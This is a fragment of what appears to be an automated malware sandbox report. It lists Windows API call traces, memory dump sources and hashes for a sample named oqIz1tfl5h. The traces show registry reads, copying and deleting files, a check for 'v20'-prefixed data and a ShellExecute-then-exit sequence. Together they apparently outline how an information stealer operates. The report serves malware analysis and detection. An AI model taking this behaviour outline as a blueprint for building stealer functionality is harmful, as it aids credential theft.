                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0303809E
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 030380A5
                                            • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 030380C5
                                            • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 030380E6
                                            • RegCloseKey.ADVAPI32(?), ref: 030380F9
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3225020163-0
                                            • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                            • Instruction ID: 81cfdc9f79ba5d4bed7d2aa9fc162348b9706dcd0f008ab6b5bb848fb06ae01e
                                            • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                            • Instruction Fuzzy Hash: 7C113DB5A84209BBD710CFD4DD4AFAFB7BDEB05710F108559F615A7280C77558048BA1
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0303799B
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 030379A2
                                            • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,03037920), ref: 030379C2
                                            • RegQueryValueExA.ADVAPI32(03037920,00420AAC,00000000,00000000,?,000000FF), ref: 030379E1
                                            • RegCloseKey.ADVAPI32(03037920), ref: 030379EB
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3225020163-0
                                            • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                            • Instruction ID: 2cca924adc531211a07c4100dd32f29f083b07e9ac3e5cdb5161ece4e1cce1a3
                                            • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                            • Instruction Fuzzy Hash: 3901ECB9A80308BFEB10DBE4DC4AFAEB7BDEB49701F104599FA05A6280D67596008B51
                                            APIs
                                            • StrStrA.SHLWAPI(02E28FF8,?,?,?,0041140C,?,02E28FF8,00000000), ref: 0041926C
                                            • lstrcpyn.KERNEL32(0064AB88,02E28FF8,02E28FF8,?,0041140C,?,02E28FF8), ref: 00419290
                                            • lstrlenA.KERNEL32(?,?,0041140C,?,02E28FF8), ref: 004192A7
                                            • wsprintfA.USER32 ref: 004192C7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpynlstrlenwsprintf
                                            • String ID: %s%s
                                            • API String ID: 1206339513-3252725368
                                            • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                            • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                            • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                            • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                            • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                            • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3466090806-0
                                            • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                            • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                            • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                            • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0302151B
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 03021522
                                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0302153E
                                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0302155C
                                            • RegCloseKey.ADVAPI32(?), ref: 03021566
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3225020163-0
                                            • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                            • Instruction ID: 76ee94f17d1c2c0d3ebf15f5c56ec0a8d2693a0cc361210f98d45b652d76589a
                                            • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                            • Instruction Fuzzy Hash: A401CDBDA40208BFDB14DFE4DC49FAEB7BDEB48705F108199FA0597280D6759A018F91
                                            APIs
                                            • __getptd.LIBCMT ref: 0041C74E
                                              • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                              • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                            • __getptd.LIBCMT ref: 0041C765
                                            • __amsg_exit.LIBCMT ref: 0041C773
                                            • __lock.LIBCMT ref: 0041C783
                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                            • String ID:
                                            • API String ID: 938513278-0
                                            • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                            • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                            • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                            • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                            APIs
                                            • __getptd.LIBCMT ref: 0303C9B5
                                              • Part of subcall function 0303C206: __getptd_noexit.LIBCMT ref: 0303C209
                                              • Part of subcall function 0303C206: __amsg_exit.LIBCMT ref: 0303C216
                                            • __getptd.LIBCMT ref: 0303C9CC
                                            • __amsg_exit.LIBCMT ref: 0303C9DA
                                            • __lock.LIBCMT ref: 0303C9EA
                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0303C9FE
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                            • String ID:
                                            • API String ID: 938513278-0
                                            • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                            • Instruction ID: 6d14a8392bf6d4af72c982bdee219382f4122799155faaadf6666116944ea25b
                                            • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                            • Instruction Fuzzy Hash: 51F09036A4A7109BE761FBB8580AB9D73A8AF83728F16024BD414FE1D0DB245540DB9A
                                            APIs
                                            • StrCmpCA.SHLWAPI(00000000,02E262E0), ref: 0041079A
                                            • StrCmpCA.SHLWAPI(00000000,02E26340), ref: 00410866
                                            • StrCmpCA.SHLWAPI(00000000,02E26230), ref: 0041099D
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy
                                            • String ID: `_A
                                            • API String ID: 3722407311-2339250863
                                            • Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                            • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                            • Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                            • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                            APIs
                                            • StrCmpCA.SHLWAPI(00000000,02E262E0), ref: 0041079A
                                            • StrCmpCA.SHLWAPI(00000000,02E26340), ref: 00410866
                                            • StrCmpCA.SHLWAPI(00000000,02E26230), ref: 0041099D
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy
                                            • String ID: `_A
                                            • API String ID: 3722407311-2339250863
                                            • Opcode ID: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                            • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                            • Opcode Fuzzy Hash: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                            • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                            • ExitProcess.KERNEL32 ref: 00416755
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                            • String ID: <
                                            • API String ID: 1148417306-4251816714
                                            • Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                            • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                            • Opcode Fuzzy Hash: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                            • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 030368CA
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                              • Part of subcall function 0303AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0303AC2C
                                              • Part of subcall function 0303AC17: lstrcpy.KERNEL32(00000000), ref: 0303AC6B
                                              • Part of subcall function 0303AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0303AC79
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 0303698D
                                            • ExitProcess.KERNEL32 ref: 030369BC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                            • String ID: <
                                            • API String ID: 1148417306-4251816714
                                            • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                            • Instruction ID: 571cf0827dab9c35f0f93ddb4c447621ee3915d7391126c1097728c925b5648a
                                            • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                            • Instruction Fuzzy Hash: CE314AB9902308ABDB14EB90DD84FDEB77CAF86300F404189E2456B190DF746B88CF59
                                            APIs
                                            • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID: @Jn@$Jn@$Jn@
                                            • API String ID: 544645111-1180188686
                                            • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                            • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                            • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                            • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                            APIs
                                            • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcatlstrcpy
                                            • String ID: vI@$vI@
                                            • API String ID: 3905823039-1245421781
                                            • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                            • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                            • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                            • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                            • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                            • wsprintfW.USER32 ref: 00418D78
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocProcesswsprintf
                                            • String ID: %hs
                                            • API String ID: 659108358-2783943728
                                            • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                            • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                            • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                            • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02DF4EB0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                            • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                            • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                            • String ID:
                                            • API String ID: 257331557-0
                                            • Opcode ID: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                            • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                            • Opcode Fuzzy Hash: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                            • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                            APIs
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                              • Part of subcall function 0303AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0303AC2C
                                              • Part of subcall function 0303AC17: lstrcpy.KERNEL32(00000000), ref: 0303AC6B
                                              • Part of subcall function 0303AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0303AC79
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                              • Part of subcall function 03038DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,03021660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 03038DED
                                              • Part of subcall function 0303AB87: lstrcpy.KERNEL32(00000000,?), ref: 0303ABD9
                                              • Part of subcall function 0303AB87: lstrcat.KERNEL32(00000000), ref: 0303ABE9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0302A548
                                            • lstrlen.KERNEL32(00000000,00000000), ref: 0302A666
                                            • lstrlen.KERNEL32(00000000), ref: 0302A923
                                              • Part of subcall function 0303AA07: lstrcpy.KERNEL32(?,00000000), ref: 0303AA4D
                                              • Part of subcall function 0302A077: memcmp.MSVCRT(?,00421264,00000003), ref: 0302A094
                                            • DeleteFileA.KERNEL32(00000000), ref: 0302A9AA
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                            • String ID:
                                            • API String ID: 257331557-0
                                            • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                            • Instruction ID: 18d0bac001e6a294c36de495cedfe3e8937740e33069b9c8fcc88a0dec4633f3
                                            • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                            • Instruction Fuzzy Hash: 32E1347AA113189BCB04FBA4DD90DEE733DAF97201F548159E0967A0A0EF306B48CF61
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02DF4EB0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                            • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                            • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
